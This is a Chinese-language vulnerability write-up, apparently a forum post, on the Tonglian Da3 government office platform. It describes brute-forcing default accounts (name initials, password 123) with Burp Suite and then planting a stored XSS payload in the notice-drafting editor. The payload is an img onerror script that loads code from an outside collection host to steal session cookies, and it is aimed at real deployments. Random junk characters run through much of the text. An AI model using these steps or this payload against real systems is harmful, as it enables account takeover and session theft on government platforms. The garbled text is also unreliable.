( i! Q s+ \: j5 X+ R
" P* h/ a L! P 同联Da3协同办公平台后台通用储存型xss漏洞) m: v. t1 r* O6 _2 E( U
6 c2 e" ?1 B. l* A9 w6 B ) i6 w* I8 i$ }! p; n0 q% E' A% t
平台简介:
2 G m3 \+ B2 e
0 C3 r& c2 Y' {+ n
9 N' p' k- T9 {8 D" X' }) A2 U " O8 s: K" `4 g% n! ~( [+ }
7 f4 z4 @/ f( s. Z
+ |) u1 z# b( x+ i( n: c' Z4 P8 _ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
Z$ S7 B6 W0 K+ o同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) k% l, e9 R$ d K9 _; c同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
. Y$ z/ u+ z; z- A- e
" K* c# Z" Y4 P' [ ; x7 T# O) ^9 D3 ]/ x: m/ K
+ K6 x5 Q0 q D" G! ^
3 _7 k" c- M% i; V) ~
" K) P/ {9 t+ `- a# X1 A 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
" l! O/ K6 Q2 M% \ x+ X* u
' m+ ~5 Q) [% x% U+ |# t+ F
% {) J; w+ b$ l$ e; ~9 I
5 F9 t0 O; r, h9 r
+ V1 ~' S+ J: V) B
( f. {% r$ Q* j: G3 R http://1.1.1.1:7197/cap-aco/#(案例2-)
, x) N3 r/ V; q1 Z5 B
. i' y# H, ?' e
8 V! m3 \2 @2 J http://www.XXOO.com (案例1-官网网站)
3 O* ]; U* Q* O( h1 `; Z( ]( f6 N
5 \* L9 a4 [% J
1 l3 c. Z' L4 T2 M) t+ C" ?
漏洞详情:9 D, e! P3 n! }, S; `) E
- A- O, O. Y$ D2 d
) d0 {& b( \4 Z; I( \; v$ |
案例一、
7 k* i# S: N# i+ s( h6 m) Y' b- {) L
7 n' z& Y2 p/ ?& a8 M1 A3 Q& \
( ?8 A+ H3 r# t0 [5 V4 S) z' J
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试- U7 J: Q, F' l5 Y( M m
$ G. l5 h% w( {* v6 m 5 E N9 [& e" {9 R
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:+ }) s/ a) g4 M, d1 F: k, L
1 z1 e1 L# x; A# N- j! J : t* ^5 T, O" B
) t, p+ E& j( D. ^
/ y1 p9 c4 ]" W2 W
. j) E( \/ _: J/ E& l/ y
0 k/ j" z/ C* U9 I) l4 N- | \
* f6 s8 R: V( u+ x9 _: N+ d" W & W# [5 U, f2 e* s( k3 G1 Q9 W
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
N& N3 k0 U: _: x5 L, R+ q
$ U2 ?( H" H1 N/ A# L, H: s* S' |1 s" J9 U
2 n$ y' n8 l, W, R% ?; z5 n
+ z0 z/ H. }/ w4 M: M0 Y4 D3 S
9 u! Z- M8 }' t6 J
0 C* R( b+ S. H
% Y) v5 d3 v- A8 L% b, `. M: S6 n
' Y" i. }' l9 @" O: H# e
7 | G: V6 l+ n3 G: F8 q% b 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
: N6 F: u6 k1 N
) } D% E, |% M: e, g; p) ?
$ F( u' z4 @' O1 \' r; z + o7 k, x9 n# B1 x# `1 P- i& q& @
) [8 h( D, n* g) S T& s
% g j; r& p8 G7 o* `6 ~ <img src=x5 }& Y3 Q5 z8 Z D9 w2 W
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
; d! J, E5 D1 J3 r. t* z. D
* J$ [6 ?0 J$ g
1 }* p$ Z+ g& t( j* [6 b1 X Y * h5 V- w# N6 C; b8 m5 _
% j& ~8 |: z! h! q' ^. X
$ X4 C# _1 h& b& ?* H 然后发送,接收cookie如图:
( ?# q8 k8 a# a
5 g$ ^- D& F6 a q9 S/ @2 h
( ~& [; O+ T6 r [
) R2 P' G7 N+ G% m0 I2 p c
% t* r5 g# {, I" Y
* y1 d0 r8 r L$ O0 G; p% v* l
, D$ {7 N! g4 n, B( B* i9 @5 S! v s
$ d; g, ]& G1 o6 d3 O* a 6 s) A$ z s% N1 `+ Q7 y
5 }3 ?# B* \9 m
+ M( ]/ g! e) |
! V. B' c; X. \$ W$ }4 H $ V& d9 d) ~! o
% R/ ]! j, H6 |4 g m+ A
/ |( `% A" i( f3 A1 S" J
5 e9 j9 d+ i: ]+ r# x5 M$ l6 S# h
* R* m$ M% n/ }1 X. L$ F. r) `8 J8 p + N. }: Z J8 w
1 D) E. l* b# d) b7 F
/ ~/ a9 j* \3 \' @0 r; c& Z/ i
( q6 V; e% z$ G L/ M
0 b) g3 `! D! F- y
: W0 V1 `! ]8 A0 B
, U5 n2 ^0 f6 b* o% W0 j
案例2、 . K1 q% w( Z/ d' J: ]7 @: t8 f* H
' u( j2 Y! k7 M+ G" O
5 C, f/ L: M, p& f# _
前面步骤都一样,下面看效果图:
1 [6 H/ \% D6 o+ h/ W: r5 m
3 \4 e3 Y: x/ i, V( \8 @8 A b ) Q, t$ a6 X# {) L0 C# |
9 b E+ ~ T$ V$ T4 b
& P( F5 O' t1 G$ Y
! L& K8 p( y& T+ Y Z) N& p0 l
$ @" ~- L; r. n
: M: t q+ g j; t9 a1 `% U( _ 2 l% Z+ R$ D2 S1 s
U4 A% O9 ^( o5 g% x; Y
7 j+ p$ ?' m: \# D* _. r5 a" d4 |
6 F4 Y: F8 |4 R# G 6 q: o* Y# h& P1 h7 c3 y
1 @4 a& R$ S( @$ A& ]! U2 k- ]8 G% R2 w
" U8 Z/ W! ^7 X, q8 x$ h : |' G7 `" U, C9 h+ E; X6 ~
}: g% ~& I/ R+ b0 T. ^2 X
5 b2 S. K' v! k, c0 y# ^# Q2 G1 y + h! P* t- d+ M1 B( ?! W) y
. d, j; Q1 x: z* H. U1 c2 Y 8 H: n* m' Y: p( [6 I9 b
, i) T6 T8 W1 e; N& d; w) H @" n
: }( P/ b. f4 d$ p# Z - w; ]9 }1 T! T U6 @* m
: |& e+ x2 P) i9 e1 R% h
1 q1 n/ m* e6 l# `
$ z6 B7 ]# D& \/ o 0 [: h O2 Q# A8 \- s
: W7 t. j8 f) s& F3 \